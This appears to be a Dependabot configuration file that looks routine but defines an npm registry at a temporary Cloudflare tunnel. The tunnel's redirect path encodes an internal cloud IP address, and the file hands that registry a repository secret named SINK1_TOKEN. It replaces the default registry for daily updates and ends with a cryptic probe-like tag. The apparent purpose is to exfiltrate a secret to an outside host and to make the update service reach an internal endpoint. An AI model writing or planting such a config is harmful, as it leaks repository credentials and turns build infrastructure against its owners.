version: 2
registries:
  p_32598:
    type: npm-registry
    url: https://trucks-commitments-neck-wal.trycloudflare.com/redir/302/aHR0cDovLzE2OC42My4xMjkuMTY6MzI1OTgv
    token: ${{secrets.SINK1_TOKEN}}
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule: {interval: "daily"}
    registries: "*"
# solo p_32598 203830Z
